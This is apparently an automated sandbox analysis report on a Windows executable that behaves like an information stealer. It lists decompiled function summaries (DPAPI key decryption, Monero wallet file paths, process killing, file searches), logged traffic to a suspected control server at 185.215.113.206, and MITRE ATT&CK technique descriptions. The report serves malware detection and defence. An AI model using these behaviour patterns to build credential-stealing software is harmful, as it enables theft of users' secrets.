Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: d6a990ad48f3a063abdf963972e9522edde352f075d02cbedf25dd221e2ddb07
Instruction ID: c0735c6978aa2e3bae77238914ae9d1d60950b6c09f9c55348a089e5e0544771
Opcode Fuzzy Hash: d6a990ad48f3a063abdf963972e9522edde352f075d02cbedf25dd221e2ddb07
Instruction Fuzzy Hash: 4C3152B6D01208ABCF04DB94ED45AFFB7B9AF58344F485568E901B3241E7359A44CBA2

Function 00E29660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00E2967B

Part of subcall function 00E28EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00E296AE,00000000), ref: 00E28EEB
Part of subcall function 00E28EE0: RtlAllocateHeap.NTDLL(00000000), ref: 00E28EF2
Part of subcall function 00E28EE0: wsprintfW.USER32 ref: 00E28F08

OpenProcess.KERNEL32(00001001,00000000,?), ref: 00E2973B
TerminateProcess.KERNEL32(00000000,00000000), ref: 00E29759
CloseHandle.KERNEL32(00000000), ref: 00E29766

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: 6d1916fd2917012e8226bc563c82f352a288eaa4c90b5742ae35c83a2b15084c
Instruction ID: f40483a87396a2254ffa41ac8b8c7b56e1dd5426d52c35776142d12037a04ae8
Opcode Fuzzy Hash: 6d1916fd2917012e8226bc563c82f352a288eaa4c90b5742ae35c83a2b15084c
Instruction Fuzzy Hash: 3A317C71A00218EBDB24DFE0ED49BEDB3B8BB44700F105459F506AF188DB78AA48CB91

Function 00E28810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00E305BF), ref: 00E2885A
Process32First.KERNEL32(?,00000128), ref: 00E2886E
Process32Next.KERNEL32(?,00000128), ref: 00E28883

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

CloseHandle.KERNEL32(?), ref: 00E288F1

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 38815df0af89d54d3b434743d492db40f311a1b2a9b009abb9823463059dab31
Instruction ID: 88eed0d9c8d4584ffaaa926648a2907a0f92150e17fddb49cc88d8fd470c47ab
Opcode Fuzzy Hash: 38815df0af89d54d3b434743d492db40f311a1b2a9b009abb9823463059dab31
Instruction Fuzzy Hash: A5318D71901228ABCB24DF95ED52FEEB7B8FF04700F5441A9F10AB6190DB306A44CFA1

Function 00E8FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E8FE13
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E8FE2C

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
Instruction ID: 2f929bb7a391d3ff25ecba40bd61cca947171eb8c62abbea80c78b1bb460ea31
Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
Instruction Fuzzy Hash: 9C01D432609726EEFE3436745CC99A73694EB017B97305379F21EA01F2EF924C419240

Function 00E27B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E30DE8,00000000,?), ref: 00E27B40
RtlAllocateHeap.NTDLL(00000000), ref: 00E27B47
GetLocalTime.KERNEL32(?,?,?,?,?,00E30DE8,00000000,?), ref: 00E27B54
wsprintfA.USER32 ref: 00E27B83

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 3bbfe9f50bbe0c81566e2444b8797d85135c280d449529b6bfda5846787fd469
Instruction ID: ed519855a73d7948463fd34376229ab2b41c3f45d7695535ac83daebb2b41110
Opcode Fuzzy Hash: 3bbfe9f50bbe0c81566e2444b8797d85135c280d449529b6bfda5846787fd469
Instruction Fuzzy Hash: BE113CB2904218ABCB24DFCAED45BBEBBF8FB4CB11F10411AF645A6284D3395940C7B0

Function 00E2CA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00E2CA7E

Part of subcall function 00E2C2A0: __amsg_exit.LIBCMT ref: 00E2C2B0

__getptd.LIBCMT ref: 00E2CA95
__amsg_exit.LIBCMT ref: 00E2CAA3
__updatetlocinfoEx_nolock.LIBCMT ref: 00E2CAC7

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: 376c6e0c232175c7f904ec08b183ddc85161dccb9f1757fe6c750e8c0c0d4124
Instruction ID: b5039f36480d9c156ceaabb47e625f4c36b7107346e14b6c9d8bc05ed6827b79
Opcode Fuzzy Hash: 376c6e0c232175c7f904ec08b183ddc85161dccb9f1757fe6c750e8c0c0d4124
Instruction Fuzzy Hash: A1F06773944738DBD620FBA8F806B4E37E0AF00724F30314AE507B62E2CB6459808B96

Function 00E904D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

CatchIt.LIBVCRUNTIME ref: 00E905DE

Strings

MOC, xrefs: 00E9050A
RCC, xrefs: 00E90512

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Catch
String ID: MOC$RCC
API String ID: 78271584-2084237596
Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
Instruction ID: dd0f7aa9a762ebe7e25aebd1cfc48575c1d8e8952f4f583fd639b8bf0d9f6191
Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
Instruction Fuzzy Hash: 15415871900209EFCF25DF98DC81AAEBBB5EF48304F599199FA0876251D3359A90DF50

Function 00E936CB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

T8, xrefs: 00E9371C

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
String ID: T8
API String ID: 0-1243456643
Opcode ID: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
Instruction ID: cbd5733198006f98867c2fb86eb96e52c7e5a26a5da37156339eef07932e74a7
Opcode Fuzzy Hash: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
Instruction Fuzzy Hash: 61216DF1600205BF9F20AFB1C8C18AB77E9AF04368714661AFA25A7651E731EE4087A0

Function 00E25190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28F9B

lstrcat.KERNEL32(?,00000000), ref: 00E251CA
lstrcat.KERNEL32(?,00E31058), ref: 00E251E7
lstrcat.KERNEL32(?,009988D8), ref: 00E251FB
lstrcat.KERNEL32(?,00E3105C), ref: 00E2520D

Part of subcall function 00E24B60: wsprintfA.USER32 ref: 00E24B7C
Part of subcall function 00E24B60: FindFirstFileA.KERNEL32(?,?), ref: 00E24B93

Part of subcall function 00E24B60: StrCmpCA.SHLWAPI(?,00E30FC4), ref: 00E24BC1
Part of subcall function 00E24B60: StrCmpCA.SHLWAPI(?,00E30FC8), ref: 00E24BD7
Part of subcall function 00E24B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00E24DCD
Part of subcall function 00E24B60: FindClose.KERNEL32(000000FF), ref: 00E24DE2

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 07a3a0ac3e10326ec898511f729aea80042034c5f712d865640fa57a7ec572e5
Instruction ID: 12544aa8caf3deda88e881d4a20ddfa7824d763df5b56e7eaf64fa4a3f78c7a2
Opcode Fuzzy Hash: 07a3a0ac3e10326ec898511f729aea80042034c5f712d865640fa57a7ec572e5
Instruction Fuzzy Hash: 20212FB6900208A7C724F770FC46EED33BC9B54700F404598F685A6185EE7596C8CF91

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E29030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00E29030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E172A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00E172A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1A2B0 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00E1A2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00E1A210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E1C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_00E1C920

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
